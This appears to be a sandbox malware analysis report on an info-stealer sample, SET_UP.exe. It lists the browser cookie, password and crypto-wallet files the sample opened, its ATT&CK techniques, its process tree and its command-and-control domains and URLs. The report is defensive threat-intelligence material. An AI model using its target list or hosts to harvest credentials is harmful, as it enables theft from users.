Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflа
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\SET_UP.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\SET_UP.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\SET_UP.exe | Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\Desktop\SET_UP.exe | Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\Desktop\SET_UP.exe | Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\Desktop\SET_UP.exe | Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\Desktop\SET_UP.exe | Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\Desktop\SET_UP.exe | Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\Desktop\SET_UP.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\SET_UP.exe | Directory queried: C:\Users\user\Documents
Source: Yara match | File source: 00000000.00000003.1909206800.000000000081A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SET_UP.exe PID: 7480, type: MEMORYSTR

            Remote Access Functionality

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: Process Memory Space: SET_UP.exe PID: 7480, type: MEMORYSTR
MITRE ATT&CK Matrix (tactics: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact)

Techniques with signature hits, by tactic, with the badge counts as shown in the report:

Execution: 121 Windows Management Instrumentation; 1 Native API; 1 Command and Scripting Interpreter; 2 PowerShell
Persistence: 1 DLL Side-Loading
Privilege Escalation: 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 1 Access Token Manipulation; 11 Process Injection
Defense Evasion: 11 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 1 Obfuscated Files or Information; 1 DLL Side-Loading; 1 Masquerading; 221 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 11 Process Injection
Credential Access: 2 OS Credential Dumping; 1 Input Capture
Discovery: 2 System Time Discovery; 12 File and Directory Discovery; 225 System Information Discovery; 521 Security Software Discovery; 2 Process Discovery; 221 Virtualization/Sandbox Evasion; 11 Application Window Discovery; 2 System Owner/User Discovery
Collection: 1 Archive Collected Data; 41 Data from Local System; 1 Input Capture
Command and Control: 1 Ingress Tool Transfer; 11 Encrypted Channel; 3 Non-Application Layer Protocol; 114 Application Layer Protocol
Impact: 1 System Shutdown/Reboot

No signature hits were recorded under Reconnaissance, Resource Development, Initial Access, Lateral Movement or Exfiltration.
Behavior Graph ID: 1584507, Sample: SET_UP.exe, Startdate: 05/01/2025, Architecture: WINDOWS, Score: 100

Contacted domains: cutefingeuker.click, klipvumisui.shop, cegu.shop
Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures

Process tree:

SET_UP.exe
  Network: cutefingeuker.click 188.114.96.3:443 (client ports 49748, 49750), CLOUDFLARENETUS, European Union; cegu.shop 185.161.251.21:443 (49757), NTLGB, United Kingdom; klipvumisui.shop 104.21.37.128:443 (49758), CLOUDFLARENETUS, United States
  Dropped: C:\...\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe (PE32)
  Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Suspicious powershell command line found; Query firmware table information (likely to detect VMs); 4 other signatures
  |- LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe
  |    Dropped: C:\...\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp (PE32)
  |    Signatures: Multi AV Scanner detection for dropped file
  |    |- LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp
  |         Dropped: C:\Users\user\AppData\Local\...\_isdecmp.dll (PE32); C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+)
  |         |- LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe
  |              Dropped: C:\...\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp (PE32)
  |              |- LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp
  |                   Dropped: C:\Users\user\AppData\...\is-FCQ2K.tmp (PE32); C:\Users\user\...\BrightLib.exe (copy) (PE32); C:\Users\user\AppData\Local\...\_isdecmp.dll (PE32); C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+)
  |                   |- BrightLib.exe
  |                   |    Signatures: Tries to detect virtualization through RDTSC time measurements; Sample or dropped binary is a compiled AutoHotkey binary; Switches to a custom stack to bypass stack traces; Found direct / indirect Syscall (likely to bypass EDR)
  |                   |- cmd.exe
  |                   |    |- conhost.exe
  |                   |    |- tasklist.exe
  |                   |    |- find.exe
  |                   |- cmd.exe
  |                   |    |- conhost.exe
  |                   |    |- 2 other processes
  |                   |- 5 other processes
  |                        |- conhost.exe
  |                        |- conhost.exe
  |                        |- tasklist.exe
  |                        |- 10 other processes
  |- powershell.exe
       |- conhost.exe

Source | Detection | Scanner | Label | Link
SET_UP.exe | 8% | Virustotal | | Browse
SET_UP.exe | 18% | ReversingLabs | Win32.Trojan.Generic |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe | 74% | ReversingLabs | Win32.Spyware.Lummastealer |
C:\Users\user\AppData\Local\Temp\is-DQ6NK.tmp\_isetup\_isdecmp.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-DQ6NK.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-K2ISP.tmp\_isetup\_isdecmp.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-K2ISP.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy) | 8% | ReversingLabs | |
C:\Users\user\AppData\Roaming\ColorStreamLib\is-FCQ2K.tmp | 8% | ReversingLabs | |
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner | Label | Link
https://cutefingeuker.click/pi | 0% | Avira URL Cloud | safe |
https://www.tomabo.com/mp4-player/purchase.html | 0% | Avira URL Cloud | safe |
https://www.tomabo.com/mp4-player/update.xml5.3.10CMP4PlayerDocGo | 0% | Avira URL Cloud | safe |
https://cutefingeuker.click/pi1 | 0% | Avira URL Cloud | safe |
https://cutefingeuker.click/ | 0% | Avira URL Cloud | safe |
https://klipvumisui.shop/int_clp_sha.txtf1$m | 100% | Avira URL Cloud | malware |
https://cutefingeuker.click/api1 | 0% | Avira URL Cloud | safe |
https://klipvumisui.shop/int_clp_sha.txtFmsZr | 100% | Avira URL Cloud | malware |
https://cutefingeuker.click/QQ | 0% | Avira URL Cloud | safe |
https://cutefingeuker.click/buL | 0% | Avira URL Cloud | safe |
https://www.tomabo.com/videos/dog-and-balls.mp4 | 0% | Avira URL Cloud | safe |
https://www.tomabo.com/mp4-player/download.html | 0% | Avira URL Cloud | safe |
https://cutefingeuker.click/&&. | 0% | Avira URL Cloud | safe |
https://cutefingeuker.click/8 | 0% | Avira URL Cloud | safe |
https://cegu.shop/u | 100% | Avira URL Cloud | malware |
https://cutefingeuker.click/bub | 0% | Avira URL Cloud | safe |
https://cutefingeuker.click/api# | 0% | Avira URL Cloud | safe |
https://www.tomabo.com/mp4-playerA | 0% | Avira URL Cloud | safe |
https://dfgh.online/invo | 100% | Avira URL Cloud | malware |
https://klipvumisui.shop/Y | 100% | Avira URL Cloud | malware |
https://klipvumisui.shop/L | 100% | Avira URL Cloud | malware |
https://www.tomabo.com/mp4-player/purchase.htmlhttps://www.tomabo.comMP4 | 0% | Avira URL Cloud | safe |
https://klipvumisui.shop/ | 100% | Avira URL Cloud | malware |
https://cutefingeuker.clGS | 0% | Avira URL Cloud | safe |
https://cutefingeuker.click:443/api | 0% | Avira URL Cloud | safe |
https://cutefingeuker.click/api | 0% | Avira URL Cloud | safe |
https://cutefingeuker.click/apig | 0% | Avira URL Cloud | safe |
https://www.tomabo.com/mp4-player | 0% | Avira URL Cloud | safe |
https://cegu.shop/8574262446/ph.txtk9 | 100% | Avira URL Cloud | malware |
cutefingeuker.click | 0% | Avira URL Cloud | safe |
https://www.tomabo.com | 0% | Avira URL Cloud | safe |
https://dfgh.online/invoker.php?compName=hZ | 100% | Avira URL Cloud | malware |
https://www.tomabo.com/mp4-player/update.xml | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
cegu.shop | 185.161.251.21 | true | false | | high
cutefingeuker.click | 188.114.96.3 | true | true | | unknown
klipvumisui.shop | 104.21.37.128 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://klipvumisui.shop/int_clp_sha.txt | false | | high
rabidcowse.shop | false | | high
wholersorie.shop | false | | high
https://cutefingeuker.click/api | true | Avira URL Cloud: safe | unknown
cloudewahsj.shop | false | | high
noisycuttej.shop | false | | high
cutefingeuker.click | true | Avira URL Cloud: safe | unknown
nearycrepso.shop | false | | high
https://cegu.shop/8574262446/ph.txt | false | | high
framekgirus.shop | false | | high
tirepublicerj.shop | false | | high
abruptyopsn.shop | false | | high
Name | Source (process whose memory contained the string) | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | SET_UP.exe | false | | high
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | SET_UP.exe | false | | high
https://certs.securetrust.com/CA0: | SET_UP.exe | false | | high
https://cutefingeuker.click/pi | SET_UP.exe | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | SET_UP.exe | false | | high
https://www.tomabo.com/mp4-player/update.xml5.3.10CMP4PlayerDocGo | SET_UP.exe | false | Avira URL Cloud: safe | unknown
http://ocsp.vikingcloud.com/0A | SET_UP.exe | false | | high
http://certs.securetrust.com/issuers/TWGCA.crt0 | SET_UP.exe | false | | high
http://ocsp.vikingcloud.com/0: | SET_UP.exe | false | | high
http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0 | SET_UP.exe | false | | high
https://cegu.shop/ | SET_UP.exe | false | | high
https://dfgh.online/invoker.php?compName= | powershell.exe | false | | high
https://klipvumisui.shop/int_clp_sha.txtf1$m | SET_UP.exe | false | Avira URL Cloud: malware | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | SET_UP.exe | false | | high
https://cutefingeuker.click/ | SET_UP.exe | false | Avira URL Cloud: safe | unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | SET_UP.exe | false | | high
https://klipvumisui.shop/int_clp_sha.txtFmsZr | SET_UP.exe | false | Avira URL Cloud: malware | unknown
http://crl.vikingcloud.com/TWGCA.crl0t | SET_UP.exe | false | | high
https://cutefingeuker.click/pi1 | SET_UP.exe | false | Avira URL Cloud: safe | unknown
https://cutefingeuker.click/buL | SET_UP.exe | false | Avira URL Cloud: safe | unknown
https://certs.securetrust.com/CA05 | SET_UP.exe | false | | high
https://www.tomabo.com/mp4-player/purchase.html | SET_UP.exe | false | Avira URL Cloud: safe | unknown
https://cutefingeuker.click/api1 | SET_UP.exe | false | Avira URL Cloud: safe | unknown
http://x1.c.lencr.org/0 | SET_UP.exe | false | | high
http://x1.i.lencr.org/0 | SET_UP.exe | false | | high
https://cutefingeuker.click/QQ | SET_UP.exe | false | Avira URL Cloud: safe | unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | SET_UP.exe | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | SET_UP.exe | false | | high
https://dfgh.online/invo | SET_UP.exe | true | Avira URL Cloud: malware | unknown
https://cutefingeuker.click/bub | SET_UP.exe | false | Avira URL Cloud: safe | unknown
https://cegu.shop/u | SET_UP.exe | false | Avira URL Cloud: malware | unknown
https://certs.securetrust.com/CA0 | SET_UP.exe | false | | high
https://www.tomabo.com/mp4-player/download.html | SET_UP.exe | false | Avira URL Cloud: safe | unknown
https://www.tomabo.com/mp4-playerA | SET_UP.exe | false | Avira URL Cloud: safe | unknown
https://support.mozilla.org/products/firefoxgro.all | SET_UP.exe | false | | high
https://cutefingeuker.click/8 | SET_UP.exe | false | Avira URL Cloud: safe | unknown
http://crl.trustwave.com/TWGCA.crl0n | SET_UP.exe | false | | high
https://cutefingeuker.click/api# | SET_UP.exe | false | Avira URL Cloud: safe | unknown
https://klipvumisui.shop/Y | SET_UP.exe | false | Avira URL Cloud: malware | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | SET_UP.exe | false | | high
https://www.tomabo.com/videos/dog-and-balls.mp4 | SET_UP.exe | false | Avira URL Cloud: safe | unknown
http://crl.securetrust.com/TWGCSCA_L1.crl0y | SET_UP.exe | false | | high
https://cutefingeuker.click/&&. | SET_UP.exe | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | SET_UP.exe | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | SET_UP.exe | false | | high
http://ocsp.rootca1.amazontrust.com0: | SET_UP.exe | false | | high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | SET_UP.exe | false | | high
                                                                                            https://klipvumisui.shop/LSET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            unknown
                                                                                            http://certificates.starfieldtech.com/repository/1604SET_UP.exe, 00000000.00000002.2021853788.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2020979262.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1929948835.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021163618.00000000007B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
